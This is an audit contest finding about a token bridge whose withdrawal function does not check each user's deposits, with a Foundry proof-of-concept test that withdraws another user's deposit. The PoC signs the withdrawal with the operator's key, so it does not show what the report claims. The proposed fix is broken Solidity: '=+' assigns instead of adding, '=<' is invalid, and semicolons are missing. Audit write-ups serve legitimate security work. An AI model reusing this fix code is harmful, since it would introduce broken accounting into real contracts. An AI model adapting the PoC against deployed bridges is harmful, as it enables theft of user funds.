Beginner FriendlyFoundryBridge
100 EXP
View results
Submission Details
Severity: high
Valid

Attacker can drain vault tokens by depositing any amount of corresponding tokens to L2

Summary

Attacker can drain vault tokens by depositing any amount of corresponding tokens to L2 as there is no checking of amount of deposit added to the bridge by each user.

Vulnerability Details

To test this create an address for the attacker:

 address attacker = makeAddr("attacker");

Transfer him some tokens in the setup

 token.transfer(address(attacker), 1e8);

Run the below test:

function testAttackerCanDrainPoolWithOperatorSignature() public {
// user to add some deposit
vm.startPrank(user);
uint256 depositAmount = 100e18;
token.approve(address(tokenBridge), depositAmount);
tokenBridge.depositTokensToL2(user, userInL2, depositAmount);
// attacker to add some deposit
vm.startPrank(attacker);
uint256 attackerAmount = 1e8;
token.approve(address(tokenBridge), attackerAmount);
tokenBridge.depositTokensToL2(attacker, userInL2, attackerAmount);
(uint8 v, bytes32 r, bytes32 s) = _signMessage(_getTokenWithdrawalMessage(attacker, depositAmount + attackerAmount), operator.key);
tokenBridge.withdrawTokensToL1(attacker, depositAmount + attackerAmount, v, r, s);
uint256 endAttackerBalance = token.balanceOf(address(attacker));
assertEq(depositAmount + attackerAmount, endAttackerBalance);
}

Impact

This can cause all the tokens of a vault to be drained as long as the attacker can acquire a small amount of those tokens.

Tools Used

Foundry

Recommendations

Create a mapping of deposits of users

 mapping(address account => uint256 deposit) depositOfUsers;

In deposits, update the mapping

 depositOfUsers[from] =+ amount;

and require that users cannot withdraw more than what they have deposited

 require(amount =< depositOfUsers[account])
 depositOfUsers[to] =- amount;

before sending the transfer

Updates

Lead Judging Commences

0xnevi Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

withdrawTokensToL1(): No check for deposits amount

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.